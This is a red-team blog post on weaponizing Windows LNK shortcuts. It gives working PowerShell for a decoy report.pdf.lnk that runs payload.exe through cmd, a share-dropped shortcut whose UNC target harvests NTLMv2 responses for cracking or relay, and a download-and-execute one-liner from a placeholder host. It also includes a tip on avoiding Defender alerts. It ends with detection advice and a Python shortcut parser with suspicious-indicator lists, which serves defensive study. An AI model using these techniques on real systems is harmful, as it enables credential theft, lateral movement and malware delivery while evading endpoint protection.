Weaponizing LNK Files in Offensive Operations
- viktor667
- Jun 19
- 4 min read
LNK files are Windows shortcut files that provide quick access to applications, files, or folders. The desktop shortcut of a browser, or of any other program, is simply an LNK file dressed up with the appropriate icon (e.g. the Firefox icon on the Firefox desktop shortcut). At their core they are files holding a set of instructions for the OS: where the shortcut's icon is stored, where the target executable is located, which arguments to pass, and so on. Although created for benign use and convenience, those same features can be abused.
For attackers, LNK files are a powerful tool for code execution and credential theft, helping them gain access and move laterally within the network. They are dangerous because:
Explorer acts on them without a click in some contexts (e.g. when rendering the icon it resolves the icon and target paths, which can trigger outbound authentication).
They can be made to look like documents (Invoice.pdf.lnk) with convincing icons, and Explorer hides the .lnk extension even when file extensions are shown.
They are native Windows functionality: no macro warnings and no separate scripting engine to launch.
During the past year there have been numerous APT campaigns in which the attackers used LNK files:
In this article we'll explore some of the ways an LNK file can be weaponized, both to gain the initial foothold in the network and after that foothold has been obtained.
Triggering the infection chain
Modern malware infection chains, such as the campaigns mentioned above, start with a trigger: the initial stage of infection, where the victim clicks on something. The trigger usually launches two things: the decoy, which convinces the victim that they opened something benign, and the actual payload, which carries the malicious code.
An LNK file makes a good trigger. The attacker controls its icon, so it can mimic the decoy's file type, and by pointing the shortcut at %COMSPEC%, the environment variable holding the path to cmd.exe, and passing arguments, they can make it run OS commands as soon as it is opened.
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("C:\Users\user1\Desktop\report.pdf.lnk")
$lnk.TargetPath = "%COMSPEC%"    # expands to C:\Windows\System32\cmd.exe at launch time
# /C runs the command line and exits; payload.exe and decoy.pdf are relative paths, so ship them
# next to the shortcut or set $lnk.WorkingDirectory
$lnk.Arguments = "/C start payload.exe && start decoy.pdf"
# borrow an icon from a signed Microsoft binary so the shortcut looks like a document
$lnk.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
$lnk.Save()
The arguments can also download the files the infection needs, the actual malware, or whatever the campaign requires, with any obfuscation and AV/EDR evasion layered on top.

Detection and Mitigation
Admins should be wary of this behavior. Defenders can look for:
LNK files spawning command interpreters or LOLBINs (powershell, cmd, mshta, etc.). When a shortcut is double-clicked the parent is explorer.exe and the .lnk path does not appear in the child's command line, so correlate the process creation with the preceding file access.
Creation of suspicious LNK files, e.g. double extensions such as .pdf.lnk in Downloads, Temp or other user-writable paths
Shortcut files whose icon or target resolves to a remote (UNC) path
To reduce exposure:
Block Windows from resolving LNK icons that point to remote shares (especially over SMB)
Block or quarantine LNK files sent via email or within ZIP/RAR attachments
Prevent execution of unauthorized programs or scripting engines launched via .LNK files
Harvesting NTLM Hashes in SMB Shares
In internal Active Directory environments, where trust relationships and Windows features intersect, default behavior can be leveraged to collect NTLM authentication material, sometimes without any user interaction. In this technique, an LNK file dropped into a shared folder silently causes domain users and machines to send their NTLMv2 responses to an attacker-controlled host.
The Scenario
This is a post-exploitation technique: you already have access to the AD environment and a host that can receive SMB authentication requests (e.g. running Impacket's smbserver.py). From that foothold you identify a writable SMB share that other users in the organization browse.
The goal is to make a user or a machine authenticate to the host running smbserver.py.
The LNK Trick
When Windows Explorer displays a folder containing a LNK file, even if the user never clicks it, the OS may resolve the shortcut's icon or target path. If either points to a UNC path (e.g. \\attacker\something), Windows authenticates to that server over SMB. If the server runs an SMB listener such as smbserver.py, the NTLMv2 challenge-response is captured immediately.
Creating the Weaponized Shortcut
The LNK file can be created using PowerShell’s WScript.Shell COM object. Here’s what the logic looks like:
$objShell = New-Object -ComObject WScript.Shell
# drop the shortcut straight into the writable share; the @ prefix makes Explorer list it near the top
$lnk = $objShell.CreateShortcut("\\WRITEABLE_SMB_SHARE_IP\SHARE\@report.pdf.lnk")
# UNC target on the attacker host: Explorer authenticates here while rendering the folder
$lnk.TargetPath = "\\CONTROLLED_HOST\@threat.png"
$lnk.WindowStyle = 1                                    # cosmetic: normal window
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"  # local icon, so only the target is remote
$lnk.HotKey = "Ctrl+Alt+O"                              # cosmetic
$lnk.Save()
The important part is that TargetPath references a file on the attacker-controlled host. When Explorer renders the link it tries to resolve that path, and the moment it does, it authenticates and leaks credentials.
Execution
From your session, or any other shell on the compromised host, you run the PowerShell script:
powershell -Command "& ([ScriptBlock]::Create((New-Object Net.WebClient).DownloadString('https://LNK_DROPPER_ORIGIN/lnkdrop.ps1')))"
🔕 Note: You may be tempted to use -ExecutionPolicy Bypass here, but in my testing, that actually triggered Microsoft Defender. Running the command without that flag succeeded without alerts.
As soon as the LNK file is created in the shared folder, it’s live.
The Payoff
Even before a real user touches the file, you will often see NTLM responses arriving at smbserver.py, usually from the compromised machine itself, since simply copying the file into the share triggers resolution. When a domain user browses the folder in Windows Explorer, their NTLMv2 response shows up on your smbserver.py host:
[+] NTLMv2-SSP Hash : DOMAIN\User::DOMAIN:112233445566778899...
That response can be cracked offline with john or hashcat, or relayed to another host (e.g. with ntlmrelayx) where SMB signing is not enforced. It is a NetNTLMv2 challenge-response, not the NT hash, so it cannot be used directly for pass-the-hash.
Why This Works
This technique relies entirely on default Windows behavior. LNK files with UNC paths cause the OS to authenticate to the destination as part of rendering the shortcut. This is used legitimately for network shortcuts and icon paths, but it also creates a quiet credential-leak vector. In many networks, SMB and NTLM authentication between internal systems is allowed, and that's the opening.
Detection and Mitigation
Admins should be wary of this behavior. Defenders can look for:
LNK files in shared folders whose target or icon points to hosts that are not file servers, or to external or uncommon IPs
SMB traffic to internal hosts not normally used for file sharing
Outbound NTLM authentication from endpoints to suspicious hosts
To reduce exposure:
Block outbound SMB (TCP 445) at the host firewall and at the egress where it is not needed
Enforce SMB signing and restrict outgoing NTLM via GPO (Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers)
Monitor for the creation or modification of LNK files in shared folders, and remove any whose target resolves outside the share
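Both Detection and Mitigation sections above ask defenders to spot shortcuts that spawn an interpreter, masquerade as documents, or resolve a UNC path. The following Python is an added example, not code from the original article: it writes a minimal MS-SHLLINK shortcut (header, StringData and an EnvironmentVariableDataBlock; it omits the LinkTargetIDList and LinkInfo that WScript.Shell also emits, and the parser skips those when present), then parses it back and flags the indicators. The two constructed samples mirror the report.pdf.lnk decoy and the @report.pdf.lnk share-dropper created above; the interpreter list, document-extension list and argument keywords are my own assumptions, not a complete signature set.

```python
"""Build and triage Windows shortcut (.lnk, MS-SHLLINK) files offline. Added example."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1) that this code reads or writes
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE, HAS_EXPSTRING = 0x10, 0x20, 0x40, 0x80, 0x200
ENV_BLOCK_SIG = 0xA0000001  # EnvironmentVariableDataBlock signature
STRINGS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
           (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))  # StringData on-disk order


def build_lnk(target, args="", icon="", icon_index=0, show_cmd=1):
    """Minimal shortcut: header + StringData + EnvironmentVariableDataBlock + terminal block.
    The target is stored only as RelativePath and as the expandable-string block, which is
    how an unexpanded %COMSPEC% survives on disk."""
    flags = (IS_UNICODE | HAS_RELPATH | HAS_EXPSTRING
             | (HAS_ARGS if args else 0) | (HAS_ICON if icon else 0))
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0,  # size, CLSID, flags, attrs
                         0, 0, 0, 0, icon_index, show_cmd, 0, 0, 0, 0)   # times, filesize, icon, show, hotkey, reserved

    def sd(s):  # one StringData item: CountCharacters + UTF-16LE characters, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    strings = sd(target) + (sd(args) if args else b"") + (sd(icon) if icon else b"")
    env = (struct.pack("<II", 0x314, ENV_BLOCK_SIG)               # BlockSize 0x314, signature
           + target.encode("ascii").ljust(260, b"\0")             # TargetAnsi, 260 bytes
           + target.encode("utf-16-le").ljust(520, b"\0"))        # TargetUnicode, 520 bytes
    return header + strings + env + b"\0\0\0\0"                   # TerminalBlock (size < 4)


def parse_lnk(data):
    """Walk the structure and return the string fields plus any expandable target."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    fields = {"icon_index": struct.unpack_from("<I", data, 56)[0]}
    off = 0x4C
    if flags & HAS_IDLIST:      # IDListSize (2 bytes) followed by the item IDs; not needed here
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:    # LinkInfoSize is the first dword of the LinkInfo block
        off += struct.unpack_from("<I", data, off)[0]
    uni = bool(flags & IS_UNICODE)
    for bit, name in STRINGS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            nbytes = count * 2 if uni else count
            fields[name] = data[off + 2:off + 2 + nbytes].decode("utf-16-le" if uni else "cp1252")
            off += 2 + nbytes
    while off + 8 <= len(data):  # ExtraData: (BlockSize, BlockSignature, ...) until size < 4
        bsize, sig = struct.unpack_from("<II", data, off)
        if bsize < 4:
            break
        if sig == ENV_BLOCK_SIG:  # TargetUnicode starts after the 260-byte TargetAnsi field
            fields["env_target"] = data[off + 268:off + 788].decode("utf-16-le").rstrip("\0")
        off += bsize
    return fields


INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}   # assumed LOLBIN list
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")  # assumed
ARG_TERMS = ("start ", "http", "-enc", "iex", "downloadstring", "certutil", "bitsadmin")  # assumed


def triage(filename, data):
    """Return human-readable findings for one shortcut (empty list means nothing flagged)."""
    fields = parse_lnk(data)
    target = fields.get("env_target") or fields.get("relative_path", "")
    findings = []
    if "%comspec%" in target.lower() or target.rsplit("\\", 1)[-1].lower() in INTERPRETERS:
        findings.append("target is a command interpreter: " + target)
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else filename.lower()
    if stem.endswith(DOC_EXTS):
        findings.append("double extension masquerading as a document: " + filename)
    for key in ("env_target", "relative_path", "working_dir", "icon_location"):
        if fields.get(key, "").startswith("\\\\"):
            findings.append(f"{key} is a UNC path (Explorer authenticates to it on render): {fields[key]}")
    args = fields.get("arguments", "")
    if any(term in args.lower() for term in ARG_TERMS):
        findings.append("suspicious arguments: " + args)
    return findings


# Constructed samples mirroring the two shortcuts created with WScript.Shell in the article
DECOY_LNK = build_lnk("%COMSPEC%", args="/C start payload.exe && start decoy.pdf",
                      icon=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", icon_index=13)
LEAK_LNK = build_lnk(r"\\CONTROLLED_HOST\@threat.png", icon=r"%windir%\system32\shell32.dll", icon_index=3)

if __name__ == "__main__":
    for name, blob in (("report.pdf.lnk", DECOY_LNK), ("@report.pdf.lnk", LEAK_LNK)):
        print(f"{name}: {len(blob)} bytes, target={parse_lnk(blob).get('env_target')}")
        for finding in triage(name, blob):
            print("  !", finding)
```

Point triage() at shortcuts pulled from a mail gateway, a share or an endpoint and it will name the field that carries the indicator, which is what you need when writing the corresponding block rule. Real shortcuts produced by WScript.Shell also carry a LinkTargetIDList and LinkInfo with a LocalBasePath; the parser skips both, so a shortcut whose UNC target lives only in LinkInfo would need that block decoded as well.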